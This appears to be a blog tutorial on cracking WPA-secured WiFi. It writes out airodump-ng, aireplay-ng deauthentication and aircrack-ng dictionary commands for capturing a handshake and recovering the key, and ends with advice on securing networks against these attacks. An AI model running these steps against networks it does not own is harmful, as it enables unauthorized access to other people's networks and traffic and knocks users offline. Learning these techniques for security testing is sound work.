Breaking

3.Wireless modes:

When you want to hack WiFi, you need to capture “handshake”. The handshake is connection of personal computer and wireless network, it is when network packet and personal computer packets meet each other. With handshake you do not need to be in WiFi range anymore, you can hack
password with handshake and WiFi name (you will learn this later). Now you need to capture all the packets that are sent through the WiFi router and all personal computers in network. There is a question like “if the MAC address is used to ensure that each packet gets delivered to the right place then how we capture it?”, and the answer is that “Yes and no, it is used to send packets to the right destination, and we as hackers can only receive packets that are sent to our MAC address , but this only applies to the default mode of your wireless card, which is ‘managed’ mode, however there is mode that allows us to capture all the packets in our WiFi range, not only the ones sent to our
device, hence the name monitor mode.”. So, now you know basics and ready to actually catch . First of all, change MAC address, enter monitor mode by typing in these commands on the photo:



You can see that finally when I checked wlan0 mode it was monitor as you can see on the image. So you are ready to actually capture handshake, then it is very easy to hack wireless network by handshake and word list.

4.Catching handshake:

Handshake packets are sent every time a client associates with the target AP. So to capture it we are going to capture every packets that are sent. In this section  we are going to use a  program called “airodump-ng”. This program lets us to sniff and capture the packets that are sent over the
network. This program is also preinstalled program. There are two step to catch handshake.

1.Start airodump-ng on the target AP (Access Point):

The syntax is something like this:
>airodump-ng --channel [channel] –bssid [bssid] –write [file-name]
[interface]
Ex: >airodump-ng –channel 6 –bssid 11:22:33:44:55:66 --write out
wlan0mon

2.Wait for a client to connect to the access point, or deauthenticate a

connected client (if any) so that their system will connect back automatically.
The syntax is something like this:

>aireplay-ng --deauth [number of deauth packets] –a [AP] –c [target]
[interfac]

Ex: >aireplay-ng –deauth 1000 –a 11:22:33:44:55:66 –c
00:AA:11:22:33 mon0

If the handshake catched, kali will inform you by top right corner of airodump-ng will say “WPA handshake”. Follow these steps and when you will catch handshake your screen should like this:



When you catch handshake you are ready to actually crack password.

5.Cracking any wireless network:

Now you have handshake and you need to download largest word list 
in the world to have change to hack password. You can download this 
word list from the following below links:



when you download one of them you are ready to hack network. We going to use aircrack-ng to crack the key. It does this by combining each password in the word list with access point name (essid) to compute a Pairwise Master Key (PMK) using pbkdf2 algorithm, the PMK is the compared to the handshake file. The syntax looks like this:

>aircrack-ng [handshake filename] –w [wordlist] [interface]

Ex: >aircrack-ng is-01.cap –w list wlan0mon
Run this syntax and wait before aircrack-ng cracks it. When the password will be hacked the screen should look like this:



Congratulations!!! You have  already hacked WPA secured wireless network!!! It is time to secure our wireless network because as you know it is very simple to hack, and if someone will do, he can then capture packets that are sent over the network and analyse  them. There will be your mail password, your social network password, card pin and so on. It is very dangerous to do not have secure wireless network. 

5.Securing Your Network From The Above Attacks:

Now that we know how to test the security of all known wireless encryption (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks as we know all the weaknesses that can be used by hackers to crack these encryption.

So lets have a look on each of these encryption one by one:

1. WEP: WEP is an old encryption, and its really weak, as we seen in the course there are a number of methods that can be used to crack this encryption regardless of the strength of the password and even if there is nobody connected to the network. These attacks are possible because of the
way WEP works, we discussed the weakness of WEP and how it can be used to crack it, some of these methods even allow you to crack the key in a few minutes.

2. WPA/WPA2: WPA and WPA2 are very similar, the only difference between them is the algorithm used to encrypt the information but both encryption work in the same way. WPA/WPA2 can be cracked in two ways

(a) If WPS feature is enabled then there is a high chance of obtaining the key regardless of its complexity, this can be done by exploiting a weakness in the WPS feature. WPS is used to allow users to connect to their wireless network without entering the key, this is done by pressing a WPS
button on both the router and the device that they want to connect, the authentication works using an eight digit pin, hackers can brute force this pin in relatively short time (in an average of 10 hours), once they get the right pin they can use a tool called raver to reverse engineer the pin and get the key,
this is all possible due to the fact that the WPS feature uses an easy pin (only 8 characters and only contains digits), so its not a weakness in WPA/WPA2, its a weakness in a feature that can be enabled on routers that use WPA/WPA2 which can be exploited to get the actual WPA/WPA2 key.

(b) If WPS is not enabled, then the only way to crack WPA/WPA2 is using a dictionary attack, in this attack a list of passwords (dictionary) is compared against a file (handshake file) to check if any of the passwords is the actual key for the network, so if the password does not exist in the word list then the attacker will not be able to find the password.


Conclusion:

1. Do not use WEP encryption, as we seen how easy it is to crack it regardless of the complexity of the password and even if there is nobody connected to the network.

2. Use WPA2 with a complex password, make sure the password contains small letters, capital letters, symbols and numbers and;

3. Ensure that the WPS feature is disabled as it can be used to crack your complex WPA2 key by brute-forcing the easy WPS pin.

1 comment: